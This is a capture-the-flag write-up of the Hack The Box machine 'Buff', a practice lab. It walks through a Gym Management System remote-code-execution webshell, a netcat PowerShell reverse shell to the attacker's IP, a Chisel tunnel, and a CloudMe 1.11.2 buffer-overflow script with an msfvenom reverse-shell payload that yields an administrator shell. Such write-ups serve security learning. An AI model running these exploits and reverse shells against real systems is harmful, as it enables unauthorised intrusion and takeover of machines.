🕵 HTB-Writeup : BUFF

2022-08-28 1487 words 7 minutes

Contents

Recon

rustscan

Rustscan is a usefull port scanning tools developed in Rust. It is not an alternative to nmap but a non-negligible improvement. Rustscan can scan all 65k port fastly then, pipe open port on a nmap scans.

This allows to speed up the discovery of open ports and to run nmap scan (with scripts) only on open ports.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


└─$ rustscan -t 2000 -b 20000 -a 10.10.10.198 -- -A -Pn -timing 5

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Open 10.10.10.198:7680
Open 10.10.10.198:8080

PORT     STATE SERVICE    REASON  VERSION
7680/tcp open  pando-pub? syn-ack
8080/tcp open  http       syn-ack Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

dirbuster

Running a dirbuster we found a lot of files and directories.

Searching vulnerabilities

Trying SQLi

I’ve tried to run an SQLi on the main page, on the login form parameters (email= & password=).

1

└─$ sqlmap -u "http://10.10.10.198:8080/home.php" --dump --batch --forms

It failed. There is no vulnerable parameters.

Then, I tried on the feedback.php page.

1

└─$ sqlmap -u "http://10.10.10.198:8080/feedback.php?feed=coucou" --dump --batch --forms

Again, the feed parameter does not seem to be vulnerable.

I tried several other pages but I could not find any SQLi. I think it’s not the entrypoint.

Gym Management Software

On the contact.php page, we found that this website was made using Gym Management Software v1.0

Searching vulnerabilities for this software with searchsploit, we found 4 vulnerabilities.

1
2
3
4
5
6
7
8
9


└─$ searchsploit gym mana
------------------------------------------------------------------ -------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ -------------------------
Gym Management System 1.0 - 'id' SQL Injection                    | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                 | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting           | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
------------------------------------------------------------------ -------------------------

I first tried to exploit the Unauthenticated Remote Code Execution vulnerability.

This exploit use a vulnerability on the gym management system, the upload.php page does not check if the user is authenticated. Thanks to that, we are able to upload files. We can upload a php file with a double extension and a magic bytes at the beginning to bypass the whitelist and the file type check.

1
2
3
4
5
6
7
8
9


└─$ python2 /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
buff\shaun

It works! We can get the user flag!

1
2


C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
***********************891c747da

Get clean shell

But the shell given by this exploit is not very good. We can’t change directory and we are not able to see errors. I manage to get a clean persistent and interactive shell.

To do so, I upload, thanks to a smb share, netcat on the target, then pop a powershell reverse shell.

1
2
3
4
5
6
7
8


# Host 
impacket-smbserver -smb2support share . -username pezzz -password pezzz
rlwrap nc -lvnp 443

# Target
net use \\10.10.16.6\share /u:pezzz pezzz
copy \\10.10.16.6\share\nc.exe
.\nc.exe -e powershell 10.10.16.6 443

We have now a clean shell.

Path to the privesc

Local recon

I first search for any vulnerable privileges enabled. Our user has no interesting privileges that could be exploited.

Then, I look for all network connection with the netstat command. I filter first by TCP port.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# show used ports
netstat -ano | findstr TCP

  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       4056
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       6532

# get 127.0.0.1 process ID and search for tasks
tasklist /v | findstr 4056
tasklist /v | findstr 6532

mysqld.exe   4056  BUFF\shaun
CloudMe.exe  6532  N/A

I found two connections that are listening one the localhost address. One is linked to a mysql server that is probably linked to the xampp server.

The other is the CloudMe.exe, a file storage service.

Search for any vulnerabilities

Using searchsploit we are able to find some vulnerabilities for the CloudMe service.

1
2
3
4
5
6
7
8
9


└─$ searchsploit cloudme                
-------------------------------------------------- ---------------------------------
 Exploit Title                                    |  Path
-------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)            | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)   | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)   | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)  | windows_x86-64/remote/45197.rb
-------------------------------------------------- ---------------------------------

We found an exploit (a buffer overflow) using python, but sadly the target don’t have any python version installed. This script can only be run in local, so for the moment, I don’t have any solution.

Tunneling

From now, the term victim refer to the Box and attacker refer to my computer

After some research, I found that it is possible to use a tunnel. A tunnel can be used to forward traffic between host and a target. This will allow to execute our exploit locally (on my machine) and forward all traffic to the Box.

To do so, I managed to use Chisel “A fast TCP/UDP tunnel, transported over HTTP, secured via SSH”.

*Scheme describing creation of a SOCKS proxy using chisel*

First, we start a chisel server on the attacker that will be listening on port 8000.

1
2


# Attacker
└─$ ./chisel server -p 8000 --reverse

On the victim, we upload chisel binary and execute it in client mode. We follow this pattern to build our command: <local-host>:<local-port>:<remote-host>:<remote-port>

1
2


# Victim
.\chisel.exe client 10.10.16.6:8000 R:8888:localhost:8888

Explaining arguments:

10.10.16.6:8000 : attacker IP and the chisel server port
R:8888:localhost:8888 :
- R : indicate that we want to listen on the remote host (attacker)
- 8888 : open a listener on port 8888 of the attacker
- localhost : all traffic are forwarded to localhost… (victim)
- 8888 : … on port 8888 of the victim

This command will create a tunnel. This tunnel allows us to forward all traffic sending to port 8888 of attacker (my computer) to port 8888 of the victim.

On the attacker, we confirm that the tunnel is well established. Moreover, it can be verified with a netstat on the attacker.

1
2
3
4


└─$ netstat -ntlp                       
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8000                 :::*                    LISTEN      19663/./chisel_1.7. 
tcp6       0      0 :::8888                 :::*                    LISTEN      19663/./chisel_1.7. 

The tunnel is well established. We are now listening on port 8888 and all traffic on that port will be forward on the victim.

Creating the exploit

Now that our tunnel is created, we can now use our python exploit locally while redirecting traffic to the box.

We take the python exploit that we found on exploitdb.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket
import sys

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
# payload here

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(buf)
except Exception as e:
	print(sys.exc_value)

The exploit use a simple buffer overflow on the CloudMe service allowing us to execute commands with administrator privileges. By default, the script’s payload allows us to invoke the calc.exe process.

We will generate our payload with msfvenom using the same pattern as the exploit but using a reverse shell payload.

1

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload

The -v payload switch allows us to get the output in payload format, allowing us to copy/paste it directly in our script, replacing the old one.

We start a netcat to listen on the port configured in our payload and we execute the exploit.

1
2
3
4
5
6
7
8


└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.198] 49820
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

whoami
buff\administrator

We get an administrator shell ! We can now retrieve the root flag :)